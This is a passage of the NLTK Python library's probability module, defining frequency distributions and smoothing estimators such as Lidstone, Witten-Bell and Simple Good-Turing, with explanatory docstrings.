# -*- coding: utf-8 -*- # Natural Language Toolkit: Probability and Statistics # # Copyright (C) 2001-2015 NLTK Project # Author: Edward Loper <[email protected]> # Steven Bird <[email protected]> (additions) # Trevor Cohn <[email protected]> (additions) # Peter Ljunglöf <[email protected]> (additions) # Liang Dong <[email protected]> (additions) # Geoffrey Sampson <[email protected]> (additions) # Ilia Kurenkov <[email protected]> (additions) # # URL: <http://nltk.org/> # For license information, see LICENSE.TXT """ Classes for representing and processing probabilistic information. The ``FreqDist`` class is used to encode "frequency distributions", which count the number of times that each outcome of an experiment occurs. The ``ProbDistI`` class defines a standard interface for "probability distributions", which encode the probability of each outcome for an experiment. There are two types of probability distribution: - "derived probability distributions" are created from frequency distributions. They attempt to model the probability distribution that generated the frequency distribution. - "analytic probability distributions" are created directly from parameters (such as variance). The ``ConditionalFreqDist`` class and ``ConditionalProbDistI`` interface are used to encode conditional distributions. Conditional probability distributions can be derived or analytic; but currently the only implementation of the ``ConditionalProbDistI`` interface is ``ConditionalProbDist``, a derived distribution. """ from __future__ import print_function, unicode_literals import math import random import warnings import array from operator import itemgetter from collections import defaultdict from functools import reduce from nltk import compat from nltk.compat import Counter from nltk.internals import raise_unorderable_types _NINF = float('-1e300') ##////////////////////////////////////////////////////// ## Frequency Distributions ##////////////////////////////////////////////////////// @compat.python_2_unicode_compatible class FreqDist(Counter): """ A frequency distribution for the outcomes of an experiment. A frequency distribution records the number of times each outcome of an experiment has occurred. For example, a frequency distribution could be used to record the frequency of each word type in a document. Formally, a frequency distribution can be defined as a function mapping from each sample to the number of times that sample occurred as an outcome. Frequency distributions are generally constructed by running a number of experiments, and incrementing the count for a sample every time it is an outcome of an experiment. For example, the following code will produce a frequency distribution that encodes how often each word occurs in a text: >>> from nltk.tokenize import word_tokenize >>> from nltk.probability import FreqDist >>> sent = 'This is an example sentence' >>> fdist = FreqDist() >>> for word in word_tokenize(sent): ... fdist[word.lower()] += 1 An equivalent way to do this is with the initializer: >>> fdist = FreqDist(word.lower() for word in word_tokenize(sent)) """ def __init__(self, samples=None): """ Construct a new frequency distribution. If ``samples`` is given, then the frequency distribution will be initialized with the count of each object in ``samples``; otherwise, it will be initialized to be empty. In particular, ``FreqDist()`` returns an empty frequency distribution; and ``FreqDist(samples)`` first creates an empty frequency distribution, and then calls ``update`` with the list ``samples``. :param samples: The samples to initialize the frequency distribution with. :type samples: Sequence """ Counter.__init__(self, samples) def N(self): """ Return the total number of sample outcomes that have been recorded by this FreqDist. For the number of unique sample values (or bins) with counts greater than zero, use ``FreqDist.B()``. :rtype: int """ return sum(self.values()) def B(self): """ Return the total number of sample values (or "bins") that have counts greater than zero. For the total number of sample outcomes recorded, use ``FreqDist.N()``. (FreqDist.B() is the same as len(FreqDist).) :rtype: int """ return len(self) def hapaxes(self): """ Return a list of all samples that occur once (hapax legomena) :rtype: list """ return [item for item in self if self[item] == 1] def Nr(self, r, bins=None): return self.r_Nr(bins)[r] def r_Nr(self, bins=None): """ Return the dictionary mapping r to Nr, the number of samples with frequency r, where Nr > 0. :type bins: int :param bins: The number of possible sample outcomes. ``bins`` is used to calculate Nr(0). In particular, Nr(0) is ``bins-self.B()``. If ``bins`` is not specified, it defaults to ``self.B()`` (so Nr(0) will be 0). :rtype: int """ _r_Nr = defaultdict(int) for count in self.values(): _r_Nr[count] += 1 # Special case for Nr[0]: _r_Nr[0] = bins - self.B() if bins is not None else 0 return _r_Nr def _cumulative_frequencies(self, samples): """ Return the cumulative frequencies of the specified samples. If no samples are specified, all counts are returned, starting with the largest. :param samples: the samples whose frequencies should be returned. :type samples: any :rtype: list(float) """ cf = 0.0 for sample in samples: cf += self[sample] yield cf # slightly odd nomenclature freq() if FreqDist does counts and ProbDist does probs, # here, freq() does probs def freq(self, sample): """ Return the frequency of a given sample. The frequency of a sample is defined as the count of that sample divided by the total number of sample outcomes that have been recorded by this FreqDist. The count of a sample is defined as the number of times that sample outcome was recorded by this FreqDist. Frequencies are always real numbers in the range [0, 1]. :param sample: the sample whose frequency should be returned. :type sample: any :rtype: float """ if self.N() == 0: return 0 return float(self[sample]) / self.N() def max(self): """ Return the sample with the greatest number of outcomes in this frequency distribution. If two or more samples have the same number of outcomes, return one of them; which sample is returned is undefined. If no outcomes have occurred in this frequency distribution, return None. :return: The sample with the maximum number of outcomes in this frequency distribution. :rtype: any or None """ if len(self) == 0: raise ValueError('A FreqDist must have at least one sample before max is defined.') return self.most_common(1)[0][0] def plot(self, *args, **kwargs): """ Plot samples from the frequency distribution displaying the most frequent sample first. If an integer parameter is supplied, stop after this many samples have been plotted. For a cumulative plot, specify cumulative=True. (Requires Matplotlib to be installed.) :param title: The title for the graph :type title: str :param cumulative: A flag to specify whether the plot is cumulative (default = False) :type title: bool """ try: from matplotlib import pylab except ImportError: raise ValueError('The plot function requires matplotlib to be installed.' 'See http://matplotlib.org/') if len(args) == 0: args = [len(self)] samples = [item for item, _ in self.most_common(*args)] cumulative = _get_kwarg(kwargs, 'cumulative', False) if cumulative: freqs = list(self._cumulative_frequencies(samples)) ylabel = "Cumulative Counts" else: freqs = [self[sample] for sample in samples] ylabel = "Counts" # percents = [f * 100 for f in freqs] only in ProbDist? pylab.grid(True, color="silver") if not "linewidth" in kwargs: kwargs["linewidth"] = 2 if "title" in kwargs: pylab.title(kwargs["title"]) del kwargs["title"] pylab.plot(freqs, **kwargs) pylab.xticks(range(len(samples)), [compat.text_type(s) for s in samples], rotation=90) pylab.xlabel("Samples") pylab.ylabel(ylabel) pylab.show() def tabulate(self, *args, **kwargs): """ Tabulate the given samples from the frequency distribution (cumulative), displaying the most frequent sample first. If an integer parameter is supplied, stop after this many samples have been plotted. :param samples: The samples to plot (default is all samples) :type samples: list """ if len(args) == 0: args = [len(self)] samples = [item for item, _ in self.most_common(*args)] cumulative = _get_kwarg(kwargs, 'cumulative', False) if cumulative: freqs = list(self._cumulative_frequencies(samples)) else: freqs = [self[sample] for sample in samples] # percents = [f * 100 for f in freqs] only in ProbDist? for i in range(len(samples)): print("%4s" % samples[i], end=' ') print() for i in range(len(samples)): print("%4d" % freqs[i], end=' ') print() def copy(self): """ Create a copy of this frequency distribution. :rtype: FreqDist """ return self.__class__(self) def __le__(self, other): if not isinstance(other, FreqDist): raise_unorderable_types("<=", self, other) return set(self).issubset(other) and all(self[key] <= other[key] for key in self) # @total_ordering doesn't work here, since the class inherits from a builtin class __ge__ = lambda self, other: not self <= other or self == other __lt__ = lambda self, other: self <= other and not self == other __gt__ = lambda self, other: not self <= other def __repr__(self): """ Return a string representation of this FreqDist. :rtype: string """ return self.pformat() def pprint(self, maxlen=10, stream=None): """ Print a string representation of this FreqDist to 'stream' :param maxlen: The maximum number of items to print :type maxlen: int :param stream: The stream to print to. stdout by default """ print(self.pformat(maxlen=maxlen), file=stream) def pformat(self, maxlen=10): """ Return a string representation of this FreqDist. :param maxlen: The maximum number of items to display :type maxlen: int :rtype: string """ items = ['{0!r}: {1!r}'.format(*item) for item in self.most_common(maxlen)] if len(self) > maxlen: items.append('...') return 'FreqDist({{{0}}})'.format(', '.join(items)) def __str__(self): """ Return a string representation of this FreqDist. :rtype: string """ return '<FreqDist with %d samples and %d outcomes>' % (len(self), self.N()) ##////////////////////////////////////////////////////// ## Probability Distributions ##////////////////////////////////////////////////////// class ProbDistI(object): """ A probability distribution for the outcomes of an experiment. A probability distribution specifies how likely it is that an experiment will have any given outcome. For example, a probability distribution could be used to predict the probability that a token in a document will have a given type. Formally, a probability distribution can be defined as a function mapping from samples to nonnegative real numbers, such that the sum of every number in the function's range is 1.0. A ``ProbDist`` is often used to model the probability distribution of the experiment used to generate a frequency distribution. """ SUM_TO_ONE = True """True if the probabilities of the samples in this probability distribution will always sum to one.""" def __init__(self): if self.__class__ == ProbDistI: raise NotImplementedError("Interfaces can't be instantiated") def prob(self, sample): """ Return the probability for a given sample. Probabilities are always real numbers in the range [0, 1]. :param sample: The sample whose probability should be returned. :type sample: any :rtype: float """ raise NotImplementedError() def logprob(self, sample): """ Return the base 2 logarithm of the probability for a given sample. :param sample: The sample whose probability should be returned. :type sample: any :rtype: float """ # Default definition, in terms of prob() p = self.prob(sample) return (math.log(p, 2) if p != 0 else _NINF) def max(self): """ Return the sample with the greatest probability. If two or more samples have the same probability, return one of them; which sample is returned is undefined. :rtype: any """ raise NotImplementedError() def samples(self): """ Return a list of all samples that have nonzero probabilities. Use ``prob`` to find the probability of each sample. :rtype: list """ raise NotImplementedError() # cf self.SUM_TO_ONE def discount(self): """ Return the ratio by which counts are discounted on average: c*/c :rtype: float """ return 0.0 # Subclasses should define more efficient implementations of this, # where possible. def generate(self): """ Return a randomly selected sample from this probability distribution. The probability of returning each sample ``samp`` is equal to ``self.prob(samp)``. """ p = random.random() p_init = p for sample in self.samples(): p -= self.prob(sample) if p <= 0: return sample # allow for some rounding error: if p < .0001: return sample # we *should* never get here if self.SUM_TO_ONE: warnings.warn("Probability distribution %r sums to %r; generate()" " is returning an arbitrary sample." % (self, p_init-p)) return random.choice(list(self.samples())) @compat.python_2_unicode_compatible class UniformProbDist(ProbDistI): """ A probability distribution that assigns equal probability to each sample in a given set; and a zero probability to all other samples. """ def __init__(self, samples): """ Construct a new uniform probability distribution, that assigns equal probability to each sample in ``samples``. :param samples: The samples that should be given uniform probability. :type samples: list :raise ValueError: If ``samples`` is empty. """ if len(samples) == 0: raise ValueError('A Uniform probability distribution must '+ 'have at least one sample.') self._sampleset = set(samples) self._prob = 1.0/len(self._sampleset) self._samples = list(self._sampleset) def prob(self, sample): return (self._prob if sample in self._sampleset else 0) def max(self): return self._samples[0] def samples(self): return self._samples def __repr__(self): return '<UniformProbDist with %d samples>' % len(self._sampleset) @compat.python_2_unicode_compatible class RandomProbDist(ProbDistI): """ Generates a random probability distribution whereby each sample will be between 0 and 1 with equal probability (uniform random distribution. Also called a continuous uniform distribution). """ def __init__(self, samples): if len(samples) == 0: raise ValueError('A probability distribution must '+ 'have at least one sample.') self._probs = self.unirand(samples) self._samples = list(self._probs.keys()) @classmethod def unirand(cls, samples): """ The key function that creates a randomized initial distribution that still sums to 1. Set as a dictionary of prob values so that it can still be passed to MutableProbDist and called with identical syntax to UniformProbDist """ randrow = [random.random() for i in range(len(samples))] total = sum(randrow) for i, x in enumerate(randrow): randrow[i] = x/total total = sum(randrow) if total != 1: #this difference, if present, is so small (near NINF) that it #can be subtracted from any element without risking probs not (0 1) randrow[-1] -= total - 1 return dict((s, randrow[i]) for i, s in enumerate(samples)) def prob(self, sample): return self._probs.get(sample, 0) def samples(self): return self._samples def __repr__(self): return '<RandomUniformProbDist with %d samples>' %len(self._probs) @compat.python_2_unicode_compatible class DictionaryProbDist(ProbDistI): """ A probability distribution whose probabilities are directly specified by a given dictionary. The given dictionary maps samples to probabilities. """ def __init__(self, prob_dict=None, log=False, normalize=False): """ Construct a new probability distribution from the given dictionary, which maps values to probabilities (or to log probabilities, if ``log`` is true). If ``normalize`` is true, then the probability values are scaled by a constant factor such that they sum to 1. If called without arguments, the resulting probability distribution assigns zero probability to all values. """ self._prob_dict = (prob_dict.copy() if prob_dict is not None else {}) self._log = log # Normalize the distribution, if requested. if normalize: if len(prob_dict) == 0: raise ValueError('A DictionaryProbDist must have at least one sample ' + 'before it can be normalized.') if log: value_sum = sum_logs(list(self._prob_dict.values())) if value_sum <= _NINF: logp = math.log(1.0/len(prob_dict), 2) for x in prob_dict: self._prob_dict[x] = logp else: for (x, p) in self._prob_dict.items(): self._prob_dict[x] -= value_sum else: value_sum = sum(self._prob_dict.values()) if value_sum == 0: p = 1.0/len(prob_dict) for x in prob_dict: self._prob_dict[x] = p else: norm_factor = 1.0/value_sum for (x, p) in self._prob_dict.items(): self._prob_dict[x] *= norm_factor def prob(self, sample): if self._log: return (2**(self._prob_dict[sample]) if sample in self._prob_dict else 0) else: return self._prob_dict.get(sample, 0) def logprob(self, sample): if self._log: return self._prob_dict.get(sample, _NINF) else: if sample not in self._prob_dict: return _NINF elif self._prob_dict[sample] == 0: return _NINF else: return math.log(self._prob_dict[sample], 2) def max(self): if not hasattr(self, '_max'): self._max = max((p,v) for (v,p) in self._prob_dict.items())[1] return self._max def samples(self): return self._prob_dict.keys() def __repr__(self): return '<ProbDist with %d samples>' % len(self._prob_dict) @compat.python_2_unicode_compatible class MLEProbDist(ProbDistI): """ The maximum likelihood estimate for the probability distribution of the experiment used to generate a frequency distribution. The "maximum likelihood estimate" approximates the probability of each sample as the frequency of that sample in the frequency distribution. """ def __init__(self, freqdist, bins=None): """ Use the maximum likelihood estimate to create a probability distribution for the experiment used to generate ``freqdist``. :type freqdist: FreqDist :param freqdist: The frequency distribution that the probability estimates should be based on. """ self._freqdist = freqdist def freqdist(self): """ Return the frequency distribution that this probability distribution is based on. :rtype: FreqDist """ return self._freqdist def prob(self, sample): return self._freqdist.freq(sample) def max(self): return self._freqdist.max() def samples(self): return self._freqdist.keys() def __repr__(self): """ :rtype: str :return: A string representation of this ``ProbDist``. """ return '<MLEProbDist based on %d samples>' % self._freqdist.N() @compat.python_2_unicode_compatible class LidstoneProbDist(ProbDistI): """ The Lidstone estimate for the probability distribution of the experiment used to generate a frequency distribution. The "Lidstone estimate" is parameterized by a real number *gamma*, which typically ranges from 0 to 1. The Lidstone estimate approximates the probability of a sample with count *c* from an experiment with *N* outcomes and *B* bins as ``c+gamma)/(N+B*gamma)``. This is equivalent to adding *gamma* to the count for each bin, and taking the maximum likelihood estimate of the resulting frequency distribution. """ SUM_TO_ONE = False def __init__(self, freqdist, gamma, bins=None): """ Use the Lidstone estimate to create a probability distribution for the experiment used to generate ``freqdist``. :type freqdist: FreqDist :param freqdist: The frequency distribution that the probability estimates should be based on. :type gamma: float :param gamma: A real number used to parameterize the estimate. The Lidstone estimate is equivalent to adding *gamma* to the count for each bin, and taking the maximum likelihood estimate of the resulting frequency distribution. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ if (bins == 0) or (bins is None and freqdist.N() == 0): name = self.__class__.__name__[:-8] raise ValueError('A %s probability distribution ' % name + 'must have at least one bin.') if (bins is not None) and (bins < freqdist.B()): name = self.__class__.__name__[:-8] raise ValueError('\nThe number of bins in a %s distribution ' % name + '(%d) must be greater than or equal to\n' % bins + 'the number of bins in the FreqDist used ' + 'to create it (%d).' % freqdist.B()) self._freqdist = freqdist self._gamma = float(gamma) self._N = self._freqdist.N() if bins is None: bins = freqdist.B() self._bins = bins self._divisor = self._N + bins * gamma if self._divisor == 0.0: # In extreme cases we force the probability to be 0, # which it will be, since the count will be 0: self._gamma = 0 self._divisor = 1 def freqdist(self): """ Return the frequency distribution that this probability distribution is based on. :rtype: FreqDist """ return self._freqdist def prob(self, sample): c = self._freqdist[sample] return (c + self._gamma) / self._divisor def max(self): # For Lidstone distributions, probability is monotonic with # frequency, so the most probable sample is the one that # occurs most frequently. return self._freqdist.max() def samples(self): return self._freqdist.keys() def discount(self): gb = self._gamma * self._bins return gb / (self._N + gb) def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<LidstoneProbDist based on %d samples>' % self._freqdist.N() @compat.python_2_unicode_compatible class LaplaceProbDist(LidstoneProbDist): """ The Laplace estimate for the probability distribution of the experiment used to generate a frequency distribution. The "Laplace estimate" approximates the probability of a sample with count *c* from an experiment with *N* outcomes and *B* bins as *(c+1)/(N+B)*. This is equivalent to adding one to the count for each bin, and taking the maximum likelihood estimate of the resulting frequency distribution. """ def __init__(self, freqdist, bins=None): """ Use the Laplace estimate to create a probability distribution for the experiment used to generate ``freqdist``. :type freqdist: FreqDist :param freqdist: The frequency distribution that the probability estimates should be based on. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ LidstoneProbDist.__init__(self, freqdist, 1, bins) def __repr__(self): """ :rtype: str :return: A string representation of this ``ProbDist``. """ return '<LaplaceProbDist based on %d samples>' % self._freqdist.N() @compat.python_2_unicode_compatible class ELEProbDist(LidstoneProbDist): """ The expected likelihood estimate for the probability distribution of the experiment used to generate a frequency distribution. The "expected likelihood estimate" approximates the probability of a sample with count *c* from an experiment with *N* outcomes and *B* bins as *(c+0.5)/(N+B/2)*. This is equivalent to adding 0.5 to the count for each bin, and taking the maximum likelihood estimate of the resulting frequency distribution. """ def __init__(self, freqdist, bins=None): """ Use the expected likelihood estimate to create a probability distribution for the experiment used to generate ``freqdist``. :type freqdist: FreqDist :param freqdist: The frequency distribution that the probability estimates should be based on. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ LidstoneProbDist.__init__(self, freqdist, 0.5, bins) def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<ELEProbDist based on %d samples>' % self._freqdist.N() @compat.python_2_unicode_compatible class HeldoutProbDist(ProbDistI): """ The heldout estimate for the probability distribution of the experiment used to generate two frequency distributions. These two frequency distributions are called the "heldout frequency distribution" and the "base frequency distribution." The "heldout estimate" uses uses the "heldout frequency distribution" to predict the probability of each sample, given its frequency in the "base frequency distribution". In particular, the heldout estimate approximates the probability for a sample that occurs *r* times in the base distribution as the average frequency in the heldout distribution of all samples that occur *r* times in the base distribution. This average frequency is *Tr[r]/(Nr[r].N)*, where: - *Tr[r]* is the total count in the heldout distribution for all samples that occur *r* times in the base distribution. - *Nr[r]* is the number of samples that occur *r* times in the base distribution. - *N* is the number of outcomes recorded by the heldout frequency distribution. In order to increase the efficiency of the ``prob`` member function, *Tr[r]/(Nr[r].N)* is precomputed for each value of *r* when the ``HeldoutProbDist`` is created. :type _estimate: list(float) :ivar _estimate: A list mapping from *r*, the number of times that a sample occurs in the base distribution, to the probability estimate for that sample. ``_estimate[r]`` is calculated by finding the average frequency in the heldout distribution of all samples that occur *r* times in the base distribution. In particular, ``_estimate[r]`` = *Tr[r]/(Nr[r].N)*. :type _max_r: int :ivar _max_r: The maximum number of times that any sample occurs in the base distribution. ``_max_r`` is used to decide how large ``_estimate`` must be. """ SUM_TO_ONE = False def __init__(self, base_fdist, heldout_fdist, bins=None): """ Use the heldout estimate to create a probability distribution for the experiment used to generate ``base_fdist`` and ``heldout_fdist``. :type base_fdist: FreqDist :param base_fdist: The base frequency distribution. :type heldout_fdist: FreqDist :param heldout_fdist: The heldout frequency distribution. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ self._base_fdist = base_fdist self._heldout_fdist = heldout_fdist # The max number of times any sample occurs in base_fdist. self._max_r = base_fdist[base_fdist.max()] # Calculate Tr, Nr, and N. Tr = self._calculate_Tr() r_Nr = base_fdist.r_Nr(bins) Nr = [r_Nr[r] for r in range(self._max_r+1)] N = heldout_fdist.N() # Use Tr, Nr, and N to compute the probability estimate for # each value of r. self._estimate = self._calculate_estimate(Tr, Nr, N) def _calculate_Tr(self): """ Return the list *Tr*, where *Tr[r]* is the total count in ``heldout_fdist`` for all samples that occur *r* times in ``base_fdist``. :rtype: list(float) """ Tr = [0.0] * (self._max_r+1) for sample in self._heldout_fdist: r = self._base_fdist[sample] Tr[r] += self._heldout_fdist[sample] return Tr def _calculate_estimate(self, Tr, Nr, N): """ Return the list *estimate*, where *estimate[r]* is the probability estimate for any sample that occurs *r* times in the base frequency distribution. In particular, *estimate[r]* is *Tr[r]/(N[r].N)*. In the special case that *N[r]=0*, *estimate[r]* will never be used; so we define *estimate[r]=None* for those cases. :rtype: list(float) :type Tr: list(float) :param Tr: the list *Tr*, where *Tr[r]* is the total count in the heldout distribution for all samples that occur *r* times in base distribution. :type Nr: list(float) :param Nr: The list *Nr*, where *Nr[r]* is the number of samples that occur *r* times in the base distribution. :type N: int :param N: The total number of outcomes recorded by the heldout frequency distribution. """ estimate = [] for r in range(self._max_r+1): if Nr[r] == 0: estimate.append(None) else: estimate.append(Tr[r]/(Nr[r]*N)) return estimate def base_fdist(self): """ Return the base frequency distribution that this probability distribution is based on. :rtype: FreqDist """ return self._base_fdist def heldout_fdist(self): """ Return the heldout frequency distribution that this probability distribution is based on. :rtype: FreqDist """ return self._heldout_fdist def samples(self): return self._base_fdist.keys() def prob(self, sample): # Use our precomputed probability estimate. r = self._base_fdist[sample] return self._estimate[r] def max(self): # Note: the Heldout estimation is *not* necessarily monotonic; # so this implementation is currently broken. However, it # should give the right answer *most* of the time. :) return self._base_fdist.max() def discount(self): raise NotImplementedError() def __repr__(self): """ :rtype: str :return: A string representation of this ``ProbDist``. """ s = '<HeldoutProbDist: %d base samples; %d heldout samples>' return s % (self._base_fdist.N(), self._heldout_fdist.N()) @compat.python_2_unicode_compatible class CrossValidationProbDist(ProbDistI): """ The cross-validation estimate for the probability distribution of the experiment used to generate a set of frequency distribution. The "cross-validation estimate" for the probability of a sample is found by averaging the held-out estimates for the sample in each pair of frequency distributions. """ SUM_TO_ONE = False def __init__(self, freqdists, bins): """ Use the cross-validation estimate to create a probability distribution for the experiment used to generate ``freqdists``. :type freqdists: list(FreqDist) :param freqdists: A list of the frequency distributions generated by the experiment. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ self._freqdists = freqdists # Create a heldout probability distribution for each pair of # frequency distributions in freqdists. self._heldout_probdists = [] for fdist1 in freqdists: for fdist2 in freqdists: if fdist1 is not fdist2: probdist = HeldoutProbDist(fdist1, fdist2, bins) self._heldout_probdists.append(probdist) def freqdists(self): """ Return the list of frequency distributions that this ``ProbDist`` is based on. :rtype: list(FreqDist) """ return self._freqdists def samples(self): # [xx] nb: this is not too efficient return set(sum([list(fd) for fd in self._freqdists], [])) def prob(self, sample): # Find the average probability estimate returned by each # heldout distribution. prob = 0.0 for heldout_probdist in self._heldout_probdists: prob += heldout_probdist.prob(sample) return prob/len(self._heldout_probdists) def discount(self): raise NotImplementedError() def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<CrossValidationProbDist: %d-way>' % len(self._freqdists) @compat.python_2_unicode_compatible class WittenBellProbDist(ProbDistI): """ The Witten-Bell estimate of a probability distribution. This distribution allocates uniform probability mass to as yet unseen events by using the number of events that have only been seen once. The probability mass reserved for unseen events is equal to *T / (N + T)* where *T* is the number of observed event types and *N* is the total number of observed events. This equates to the maximum likelihood estimate of a new type event occurring. The remaining probability mass is discounted such that all probability estimates sum to one, yielding: - *p = T / Z (N + T)*, if count = 0 - *p = c / (N + T)*, otherwise """ def __init__(self, freqdist, bins=None): """ Creates a distribution of Witten-Bell probability estimates. This distribution allocates uniform probability mass to as yet unseen events by using the number of events that have only been seen once. The probability mass reserved for unseen events is equal to *T / (N + T)* where *T* is the number of observed event types and *N* is the total number of observed events. This equates to the maximum likelihood estimate of a new type event occurring. The remaining probability mass is discounted such that all probability estimates sum to one, yielding: - *p = T / Z (N + T)*, if count = 0 - *p = c / (N + T)*, otherwise The parameters *T* and *N* are taken from the ``freqdist`` parameter (the ``B()`` and ``N()`` values). The normalizing factor *Z* is calculated using these values along with the ``bins`` parameter. :param freqdist: The frequency counts upon which to base the estimation. :type freqdist: FreqDist :param bins: The number of possible event types. This must be at least as large as the number of bins in the ``freqdist``. If None, then it's assumed to be equal to that of the ``freqdist`` :type bins: int """ assert bins is None or bins >= freqdist.B(),\ 'bins parameter must not be less than %d=freqdist.B()' % freqdist.B() if bins is None: bins = freqdist.B() self._freqdist = freqdist self._T = self._freqdist.B() self._Z = bins - self._freqdist.B() self._N = self._freqdist.N() # self._P0 is P(0), precalculated for efficiency: if self._N==0: # if freqdist is empty, we approximate P(0) by a UniformProbDist: self._P0 = 1.0 / self._Z else: self._P0 = self._T / float(self._Z * (self._N + self._T)) def prob(self, sample): # inherit docs from ProbDistI c = self._freqdist[sample] return (c / float(self._N + self._T) if c != 0 else self._P0) def max(self): return self._freqdist.max() def samples(self): return self._freqdist.keys() def freqdist(self): return self._freqdist def discount(self): raise NotImplementedError() def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<WittenBellProbDist based on %d samples>' % self._freqdist.N() ##////////////////////////////////////////////////////// ## Good-Turing Probability Distributions ##////////////////////////////////////////////////////// # Good-Turing frequency estimation was contributed by Alan Turing and # his statistical assistant I.J. Good, during their collaboration in # the WWII. It is a statistical technique for predicting the # probability of occurrence of objects belonging to an unknown number # of species, given past observations of such objects and their # species. (In drawing balls from an urn, the 'objects' would be balls # and the 'species' would be the distinct colors of the balls (finite # but unknown in number). # # Good-Turing method calculates the probability mass to assign to # events with zero or low counts based on the number of events with # higher counts. It does so by using the adjusted count *c\**: # # - *c\* = (c + 1) N(c + 1) / N(c)* for c >= 1 # - *things with frequency zero in training* = N(1) for c == 0 # # where *c* is the original count, *N(i)* is the number of event types # observed with count *i*. We can think the count of unseen as the count # of frequency one (see Jurafsky & Martin 2nd Edition, p101). # # This method is problematic because the situation ``N(c+1) == 0`` # is quite common in the original Good-Turing estimation; smoothing or # interpolation of *N(i)* values is essential in practice. # # Bill Gale and Geoffrey Sampson present a simple and effective approach, # Simple Good-Turing. As a smoothing curve they simply use a power curve: # # Nr = a*r^b (with b < -1 to give the appropriate hyperbolic # relationship) # # They estimate a and b by simple linear regression technique on the # logarithmic form of the equation: # # log Nr = a + b*log(r) # # However, they suggest that such a simple curve is probably only # appropriate for high values of r. For low values of r, they use the # measured Nr directly. (see M&S, p.213) # # Gale and Sampson propose to use r while the difference between r and # r* is 1.96 greater than the standard deviation, and switch to r* if # it is less or equal: # # |r - r*| > 1.96 * sqrt((r + 1)^2 (Nr+1 / Nr^2) (1 + Nr+1 / Nr)) # # The 1.96 coefficient correspond to a 0.05 significance criterion, # some implementations can use a coefficient of 1.65 for a 0.1 # significance criterion. # ##////////////////////////////////////////////////////// ## Simple Good-Turing Probablity Distributions ##////////////////////////////////////////////////////// @compat.python_2_unicode_compatible class SimpleGoodTuringProbDist(ProbDistI): """ SimpleGoodTuring ProbDist approximates from frequency to frequency of frequency into a linear line under log space by linear regression. Details of Simple Good-Turing algorithm can be found in: - Good Turing smoothing without tears" (Gale & Sampson 1995), Journal of Quantitative Linguistics, vol. 2 pp. 217-237. - "Speech and Language Processing (Jurafsky & Martin), 2nd Edition, Chapter 4.5 p103 (log(Nc) = a + b*log(c)) - http://www.grsampson.net/RGoodTur.html Given a set of pair (xi, yi), where the xi denotes the frequency and yi denotes the frequency of frequency, we want to minimize their square variation. E(x) and E(y) represent the mean of xi and yi. - slope: b = sigma ((xi-E(x)(yi-E(y))) / sigma ((xi-E(x))(xi-E(x))) - intercept: a = E(y) - b.E(x) """ SUM_TO_ONE = False def __init__(self, freqdist, bins=None): """ :param freqdist: The frequency counts upon which to base the estimation. :type freqdist: FreqDist :param bins: The number of possible event types. This must be larger than the number of bins in the ``freqdist``. If None, then it's assumed to be equal to ``freqdist``.B() + 1 :type bins: int """ assert bins is None or bins > freqdist.B(),\ 'bins parameter must not be less than %d=freqdist.B()+1' % (freqdist.B()+1) if bins is None: bins = freqdist.B() + 1 self._freqdist = freqdist self._bins = bins r, nr = self._r_Nr() self.find_best_fit(r, nr) self._switch(r, nr) self._renormalize(r, nr) def _r_Nr_non_zero(self): r_Nr = self._freqdist.r_Nr() del r_Nr[0] return r_Nr def _r_Nr(self): """ Split the frequency distribution in two list (r, Nr), where Nr(r) > 0 """ nonzero = self._r_Nr_non_zero() if not nonzero: return [], [] return zip(*sorted(nonzero.items())) def find_best_fit(self, r, nr): """ Use simple linear regression to tune parameters self._slope and self._intercept in the log-log space based on count and Nr(count) (Work in log space to avoid floating point underflow.) """ # For higher sample frequencies the data points becomes horizontal # along line Nr=1. To create a more evident linear model in log-log # space, we average positive Nr values with the surrounding zero # values. (Church and Gale, 1991) if not r or not nr: # Empty r or nr? return zr = [] for j in range(len(r)): i = (r[j-1] if j > 0 else 0) k = (2 * r[j] - i if j == len(r) - 1 else r[j+1]) zr_ = 2.0 * nr[j] / (k - i) zr.append(zr_) log_r = [math.log(i) for i in r] log_zr = [math.log(i) for i in zr] xy_cov = x_var = 0.0 x_mean = 1.0 * sum(log_r) / len(log_r) y_mean = 1.0 * sum(log_zr) / len(log_zr) for (x, y) in zip(log_r, log_zr): xy_cov += (x - x_mean) * (y - y_mean) x_var += (x - x_mean)**2 self._slope = (xy_cov / x_var if x_var != 0 else 0.0) if self._slope >= -1: warnings.warn('SimpleGoodTuring did not find a proper best fit ' 'line for smoothing probabilities of occurrences. ' 'The probability estimates are likely to be ' 'unreliable.') self._intercept = y_mean - self._slope * x_mean def _switch(self, r, nr): """ Calculate the r frontier where we must switch from Nr to Sr when estimating E[Nr]. """ for i, r_ in enumerate(r): if len(r) == i + 1 or r[i+1] != r_ + 1: # We are at the end of r, or there is a gap in r self._switch_at = r_ break Sr = self.smoothedNr smooth_r_star = (r_ + 1) * Sr(r_+1) / Sr(r_) unsmooth_r_star = 1.0 * (r_ + 1) * nr[i+1] / nr[i] std = math.sqrt(self._variance(r_, nr[i], nr[i+1])) if abs(unsmooth_r_star-smooth_r_star) <= 1.96 * std: self._switch_at = r_ break def _variance(self, r, nr, nr_1): r = float(r) nr = float(nr) nr_1 = float(nr_1) return (r + 1.0)**2 * (nr_1 / nr**2) * (1.0 + nr_1 / nr) def _renormalize(self, r, nr): """ It is necessary to renormalize all the probability estimates to ensure a proper probability distribution results. This can be done by keeping the estimate of the probability mass for unseen items as N(1)/N and renormalizing all the estimates 